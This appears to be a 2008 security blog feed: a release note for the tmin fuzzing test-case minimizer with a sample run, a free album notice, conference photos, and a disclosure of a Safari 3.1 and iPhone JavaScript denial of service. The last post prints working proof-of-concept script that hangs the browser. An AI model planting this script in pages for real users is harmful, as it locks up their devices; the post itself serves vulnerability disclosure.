Security-Protocols

Tmin fuzzing test case optimizer released

Tom Ferris — Tue, 06 May 2008 23:17:47 +0000

Tmin is a quick and simple tool to minimize the size and syntax of complex test cases in automated security testing.

The tool is somewhat related to delta, which is a more featured general purpose optimizer but is meant specifically for dealing with unknown or complex data formats (without the need to tokenize and re-serialize testcases), for hands-off detection of security fault conditions, and for easy integration with UI testing harnesses.

tmin is also capable of reducing the complexity of alphabets used on datasets that cannot be further trimmed down in size.

Below is an example run of tmin:
$ cat testcase.in This is a lengthy and annoying hello world testcase.


$ cat testme.sh

#!/bin/bash
grep "el..*wo" || exit 0

exit 1
$ ../tmin -x ./testme.sh

tmin - complex testcase minimizer, version 0.03-beta (lcamtuf@google.com)

[*] Stage 0: loading 'testcase.in' and validating fault condition...

[*] Stage 1: recursive truncation (round 1, input = 53/53)

[*] Stage 1: recursive truncation (round 2, input = 27/53)

[*] Stage 1: recursive truncation (round 3, input = 14/53)

[*] Stage 1: recursive truncation (round 4, input = 10/53)

[*] Stage 1: recursive truncation (round 5, input = 8/53)

[*] Stage 1: recursive truncation (round 6, input = 7/53)

[*] Stage 2: block skipping (round 1, input = 7/53)

[*] Stage 2: block skipping (round 2, input = 6/53)

[*] Stage 2: block skipping (round 3, input = 5/53)

[*] Stage 3: alphabet normalization (round 1, charset = 5/5)

[*] Stage 3: alphabet normalization (round 2, charset = 5/5)

[*] Stage 4: character normalization (round 1, characters = 4/5)

[*] All done - writing output to 'testcase.small'...
== Final statistics==

Original size : 53 bytes

Optimized size : 5 bytes (-90.57%)

Chars replaced : 1 (1.89%)

   Efficiency : 9 good / 49 bad

 Round counts : 1:6 2:3 3:2 4:1

$ cat testcase.small el0wo

Download:
http://code.google.com/p/tmin

Usage:
http://code.google.com/p/tmin/wiki/TminManual

NiN Gives Away Full Length Album - The Slip

Tom Ferris — Mon, 05 May 2008 15:09:06 +0000

Nine Inch Nails is giving away their new album for free entitled The Slip, exclusively from NiN.com. The album is available in a variety of formats including high-quality MP3, FLAC and or M4A lossless at CD quality and even higher-than-CD quality 24/96 WAVE.

Click on the link below to your copy:

http://dl.nin.com/theslip/signup

Fortify: The New Face of Cybercrime

Tom Ferris — Wed, 30 Apr 2008 15:24:50 +0000

CanSecWest 2008 Photos

Tom Ferris — Sat, 05 Apr 2008 02:12:43 +0000

I finally got around to posting the shots I took while I was in Vancouver, British Columbia for CanSecWest 2008. This was my first time going to CanSecWest and I must say it was a great conference. It doesn’t have all of that hype and BS like BlackHat does.. Ill defiantly be going next year.

Full photo set here:
http://flickr.com/photos/tomferris/sets/72157604376917452/

Safari 3.1 JavaScript DoS Released

Tom Ferris — Thu, 20 Mar 2008 02:48:48 +0000

Georgi Guninski has discovered a denial of service vulnerability in Safari 3.1 which causes the browser to hang, and not crash. This DoS also affects iPhones running firmware version 1.1.4 and, all other earlier versions.

When visiting a site with the malformed JavaScript, the iPhone will lock up becoming causing the user to have to reboot the phone. The current workaround is to disable JavaScript on your iPhone and or iPod touch.

Below is the source of PoC which will trigger the hang (not a crash).
Copyright Georgi Guninski Cannot be used in vulnerability databases Especially securityfocus/mitre/cve/cert SCRIPT var s=String.fromCharCode(257); var ki=”"; var me=”"; for(i=0;i<1024;i++) {ki=ki+s;} for(i=0;i<1024;i++) {me=me+ki;} var ov=s; for(i=0;i<28;i++) ov += ov; for(i=0;i<88;i++) ov += me;

alert("done generating"); var fuckbill=escape(ov); alert("done escape"); alert(fuckbill); SCRIPT